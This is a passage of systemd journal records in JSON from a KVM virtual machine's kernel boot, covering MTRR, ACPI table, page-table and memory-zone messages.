"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=21;b=e2b08827b5804427b422c10c84f1567e;m=558250;t=5bd16dd1901b8;x=3a0ef5af2fac8430", "__REALTIME_TIMESTAMP" : "1615280779887032", "__MONOTONIC_TIMESTAMP" : "5603920", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " 0 base 0080000000 mask FF80000000 uncachable" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=22;b=e2b08827b5804427b422c10c84f1567e;m=558259;t=5bd16dd1901c1;x=3662b4af19fec2c4", "__REALTIME_TIMESTAMP" : "1615280779887041", "__MONOTONIC_TIMESTAMP" : "5603929", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " 1 disabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=23;b=e2b08827b5804427b422c10c84f1567e;m=558265;t=5bd16dd1901cc;x=d9edabc73fc9138c", "__REALTIME_TIMESTAMP" : "1615280779887052", "__MONOTONIC_TIMESTAMP" : "5603941", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " 2 disabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=24;b=e2b08827b5804427b422c10c84f1567e;m=55826d;t=5bd16dd1901d5;x=a1281317ddbe980", "__REALTIME_TIMESTAMP" : "1615280779887061", "__MONOTONIC_TIMESTAMP" : "5603949", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : 
"ubuntu", "PRIORITY" : "7", "MESSAGE" : " 3 disabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=25;b=e2b08827b5804427b422c10c84f1567e;m=558276;t=5bd16dd1901de;x=c3c4e867250818c7", "__REALTIME_TIMESTAMP" : "1615280779887070", "__MONOTONIC_TIMESTAMP" : "5603958", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " 4 disabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=26;b=e2b08827b5804427b422c10c84f1567e;m=55827f;t=5bd16dd1901e6;x=d74e81ef909ae85c", "__REALTIME_TIMESTAMP" : "1615280779887078", "__MONOTONIC_TIMESTAMP" : "5603967", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " 5 disabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=27;b=e2b08827b5804427b422c10c84f1567e;m=558288;t=5bd16dd1901ef;x=ecd4fa263890de6e", "__REALTIME_TIMESTAMP" : "1615280779887087", "__MONOTONIC_TIMESTAMP" : "5603976", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " 6 disabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=28;b=e2b08827b5804427b422c10c84f1567e;m=558291;t=5bd16dd1901f8;x=f8cc968f8f9e390b", "__REALTIME_TIMESTAMP" : "1615280779887096", "__MONOTONIC_TIMESTAMP" : "5603985", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : 
"e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " 7 disabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=29;b=e2b08827b5804427b422c10c84f1567e;m=55829d;t=5bd16dd190205;x=d8b4a1c3e4d93a07", "__REALTIME_TIMESTAMP" : "1615280779887109", "__MONOTONIC_TIMESTAMP" : "5603997", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "x86/PAT: Configuration [0-7]: WB WC UC- UC WB WP UC- WT " } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a;b=e2b08827b5804427b422c10c84f1567e;m=5582b6;t=5bd16dd19021d;x=a40abd55b189474a", "__REALTIME_TIMESTAMP" : "1615280779887133", "__MONOTONIC_TIMESTAMP" : "5604022", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "found SMP MP-table at [mem 0x000f6a80-0x000f6a8f]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b;b=e2b08827b5804427b422c10c84f1567e;m=5582be;t=5bd16dd190226;x=509ad16951a77cd3", "__REALTIME_TIMESTAMP" : "1615280779887142", "__MONOTONIC_TIMESTAMP" : "5604030", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Scanning 1 areas for low memory corruption" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c;b=e2b08827b5804427b422c10c84f1567e;m=5582ca;t=5bd16dd190231;x=fa904621ba25687f", "__REALTIME_TIMESTAMP" : "1615280779887153", "__MONOTONIC_TIMESTAMP" : "5604042", "_BOOT_ID" : 
"e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Using GB pages for direct mapping" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d;b=e2b08827b5804427b422c10c84f1567e;m=5582eb;t=5bd16dd190253;x=189beb4897315588", "__REALTIME_TIMESTAMP" : "1615280779887187", "__MONOTONIC_TIMESTAMP" : "5604075", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "BRK [0x3c740000, 0x3c740fff] PGTABLE" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e;b=e2b08827b5804427b422c10c84f1567e;m=5582f5;t=5bd16dd19025d;x=e5585ff116a8653d", "__REALTIME_TIMESTAMP" : "1615280779887197", "__MONOTONIC_TIMESTAMP" : "5604085", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "BRK [0x3c741000, 0x3c741fff] PGTABLE" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f;b=e2b08827b5804427b422c10c84f1567e;m=558303;t=5bd16dd19026a;x=d13f73606857f1af", "__REALTIME_TIMESTAMP" : "1615280779887210", "__MONOTONIC_TIMESTAMP" : "5604099", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "BRK [0x3c742000, 0x3c742fff] PGTABLE" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=30;b=e2b08827b5804427b422c10c84f1567e;m=55830c;t=5bd16dd190274;x=261516535cb52e0e", "__REALTIME_TIMESTAMP" : "1615280779887220", "__MONOTONIC_TIMESTAMP" : "5604108", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "BRK [0x3c743000, 0x3c743fff] PGTABLE" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=31;b=e2b08827b5804427b422c10c84f1567e;m=558315;t=5bd16dd19027d;x=8216a6812b4e768a", "__REALTIME_TIMESTAMP" : "1615280779887229", "__MONOTONIC_TIMESTAMP" : "5604117", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "BRK [0x3c744000, 0x3c744fff] PGTABLE" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=32;b=e2b08827b5804427b422c10c84f1567e;m=55831e;t=5bd16dd190286;x=60eae5c564d793ce", "__REALTIME_TIMESTAMP" : "1615280779887238", "__MONOTONIC_TIMESTAMP" : "5604126", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "BRK [0x3c745000, 0x3c745fff] PGTABLE" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=33;b=e2b08827b5804427b422c10c84f1567e;m=558327;t=5bd16dd19028e;x=d9f5ca398cadfe66", "__REALTIME_TIMESTAMP" : "1615280779887246", "__MONOTONIC_TIMESTAMP" : "5604135", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : 
"e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "RAMDISK: [mem 0x35a8b000-0x36d3cfff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=34;b=e2b08827b5804427b422c10c84f1567e;m=558330;t=5bd16dd190297;x=3d2a38af987659e7", "__REALTIME_TIMESTAMP" : "1615280779887255", "__MONOTONIC_TIMESTAMP" : "5604144", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: Early table checksum verification disabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=35;b=e2b08827b5804427b422c10c84f1567e;m=558339;t=5bd16dd1902a0;x=d7f562e2ee7b8782", "__REALTIME_TIMESTAMP" : "1615280779887264", "__MONOTONIC_TIMESTAMP" : "5604153", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: RSDP 0x00000000000F6880 000014 (v00 BOCHS )" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=36;b=e2b08827b5804427b422c10c84f1567e;m=558345;t=5bd16dd1902ad;x=9aa520c7db1dadf7", "__REALTIME_TIMESTAMP" : "1615280779887277", "__MONOTONIC_TIMESTAMP" : "5604165", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: RSDT 0x000000007FFE1504 00002C (v01 BOCHS BXPCRSDT 00000001 BXPC 00000001)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=37;b=e2b08827b5804427b422c10c84f1567e;m=55834e;t=5bd16dd1902b6;x=61ec46507e358bdf", "__REALTIME_TIMESTAMP" : "1615280779887286", 
"__MONOTONIC_TIMESTAMP" : "5604174", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: FACP 0x000000007FFE1418 000074 (v01 BOCHS BXPCFACP 00000001 BXPC 00000001)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=38;b=e2b08827b5804427b422c10c84f1567e;m=55835b;t=5bd16dd1902c2;x=9365a8a8002a3511", "__REALTIME_TIMESTAMP" : "1615280779887298", "__MONOTONIC_TIMESTAMP" : "5604187", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: DSDT 0x000000007FFE0040 0013D8 (v01 BOCHS BXPCDSDT 00000001 BXPC 00000001)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=39;b=e2b08827b5804427b422c10c84f1567e;m=558364;t=5bd16dd1902cb;x=964af1c7dae52a2a", "__REALTIME_TIMESTAMP" : "1615280779887307", "__MONOTONIC_TIMESTAMP" : "5604196", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: FACS 0x000000007FFE0000 000040" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=3a;b=e2b08827b5804427b422c10c84f1567e;m=55836d;t=5bd16dd1902d4;x=cf945d10e52f8f74", "__REALTIME_TIMESTAMP" : "1615280779887316", "__MONOTONIC_TIMESTAMP" : "5604205", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" 
: "ACPI: APIC 0x000000007FFE148C 000078 (v01 BOCHS BXPCAPIC 00000001 BXPC 00000001)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=3b;b=e2b08827b5804427b422c10c84f1567e;m=558376;t=5bd16dd1902dd;x=edf10699cb629bdf", "__REALTIME_TIMESTAMP" : "1615280779887325", "__MONOTONIC_TIMESTAMP" : "5604214", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "ACPI: Local APIC address 0xfee00000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=3c;b=e2b08827b5804427b422c10c84f1567e;m=55838f;t=5bd16dd1902f7;x=e9018680f2c50874", "__REALTIME_TIMESTAMP" : "1615280779887351", "__MONOTONIC_TIMESTAMP" : "5604239", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "No NUMA configuration found" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=3d;b=e2b08827b5804427b422c10c84f1567e;m=5583a9;t=5bd16dd190310;x=b35bf5c4d6572fc4", "__REALTIME_TIMESTAMP" : "1615280779887376", "__MONOTONIC_TIMESTAMP" : "5604265", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Faking a node at [mem 0x0000000000000000-0x000000007ffdbfff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=3e;b=e2b08827b5804427b422c10c84f1567e;m=5583b3;t=5bd16dd19031a;x=818beee0419abbe8", "__REALTIME_TIMESTAMP" : "1615280779887386", "__MONOTONIC_TIMESTAMP" : "5604275", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", 
"_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "NODE_DATA(0) allocated [mem 0x7ffb1000-0x7ffdbfff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=3f;b=e2b08827b5804427b422c10c84f1567e;m=5583c7;t=5bd16dd19032e;x=51812eea7aa9592c", "__REALTIME_TIMESTAMP" : "1615280779887406", "__MONOTONIC_TIMESTAMP" : "5604295", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "kvm-clock: cpu 0, msr 0:7ff30001, primary cpu clock" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=40;b=e2b08827b5804427b422c10c84f1567e;m=5583d0;t=5bd16dd190338;x=939313d67c299460", "__REALTIME_TIMESTAMP" : "1615280779887416", "__MONOTONIC_TIMESTAMP" : "5604304", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "kvm-clock: Using msrs 4b564d01 and 4b564d00" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=41;b=e2b08827b5804427b422c10c84f1567e;m=5583da;t=5bd16dd190341;x=cf0e2f81d211a7f4", "__REALTIME_TIMESTAMP" : "1615280779887425", "__MONOTONIC_TIMESTAMP" : "5604314", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "kvm-clock: using sched offset of 11561140508 cycles" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=42;b=e2b08827b5804427b422c10c84f1567e;m=5583e6;t=5bd16dd19034e;x=d9b58dae827177ce", "__REALTIME_TIMESTAMP" : "1615280779887438", "__MONOTONIC_TIMESTAMP" : "5604326", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "clocksource: kvm-clock: mask: 0xffffffffffffffff max_cycles: 0x1cd42e4dffb, max_idle_ns: 881590591483 ns" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=43;b=e2b08827b5804427b422c10c84f1567e;m=5583f0;t=5bd16dd190357;x=c9b43b89a213bb5a", "__REALTIME_TIMESTAMP" : "1615280779887447", "__MONOTONIC_TIMESTAMP" : "5604336", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Zone ranges:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=44;b=e2b08827b5804427b422c10c84f1567e;m=5583f9;t=5bd16dd190361;x=416a4da24a7374a1", "__REALTIME_TIMESTAMP" : "1615280779887457", "__MONOTONIC_TIMESTAMP" : "5604345", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " DMA [mem 0x0000000000001000-0x0000000000ffffff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=45;b=e2b08827b5804427b422c10c84f1567e;m=558403;t=5bd16dd19036a;x=662b5e9ad1909f5e", "__REALTIME_TIMESTAMP" : "1615280779887466", "__MONOTONIC_TIMESTAMP" : "5604355", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", 
"SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " DMA32 [mem 0x0000000001000000-0x000000007ffdbfff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=46;b=e2b08827b5804427b422c10c84f1567e;m=55840c;t=5bd16dd190374;x=3a39ce413a58fd84", "__REALTIME_TIMESTAMP" : "1615280779887476", "__MONOTONIC_TIMESTAMP" : "5604364", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " Normal empty" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=47;b=e2b08827b5804427b422c10c84f1567e;m=558416;t=5bd16dd19037d;x=2500f0e789913fc2", "__REALTIME_TIMESTAMP" : "1615280779887485", "__MONOTONIC_TIMESTAMP" : "5604374", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " Device empty" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=48;b=e2b08827b5804427b422c10c84f1567e;m=55841f;t=5bd16dd190387;x=6fd45817ea8b18ff", "__REALTIME_TIMESTAMP" : "1615280779887495", "__MONOTONIC_TIMESTAMP" : "5604383", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Movable zone start for each node" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=49;b=e2b08827b5804427b422c10c84f1567e;m=558439;t=5bd16dd1903a1;x=ea71b959dd5cf713", "__REALTIME_TIMESTAMP" : "1615280779887521", "__MONOTONIC_TIMESTAMP" : "5604409", "_BOOT_ID" : 
